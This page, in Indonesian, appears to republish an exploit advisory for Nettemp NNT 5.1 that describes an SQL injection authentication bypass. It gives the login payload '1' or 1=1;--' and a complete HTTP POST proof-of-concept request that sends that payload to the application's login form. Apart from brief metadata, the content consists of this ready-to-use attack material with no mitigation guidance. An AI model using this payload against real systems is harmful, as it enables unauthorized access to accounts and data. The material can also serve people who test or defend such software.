Injeksi SQL Nettmp NNT 5.1

  • Whatsapp
WordPress Catch Themes Demo Impor 1.6.1 Unggah Shell
WordPress Catch Themes Demo Impor Unggah Shell

News.nextcloud.asia

Nettmp NNT versi 5.1 mengalami kerentanan injeksi SQL jarak jauh yang memungkinkan bypass otentikasi.

MD5 | ecd2cd7737dd5aec54368728d4596e0a

# Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass
# Date: 23/12/2021
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://wiki.nettemp.tk
# Software Link: https://wiki.nettemp.tk
# Version: nettmp NNT
# Tested on: Linux (Ubuntu 20.04)

Payload:

username: 1' or 1=1;--
password:

Proof of Concept:

POST /index.php?id=status HTTP/1.1
Host: vuln.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://vuln.com
DNT: 1
Connection: close
Referer: http://vulnIP/index.php?id=status
Cookie: PHPSESSID=v8hmih4u92mftquen8gtvpstsq
Upgrade-Insecure-Requests: 1

username=1%27+or+1%3D1%3B--&password=%5C&form_login=log

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.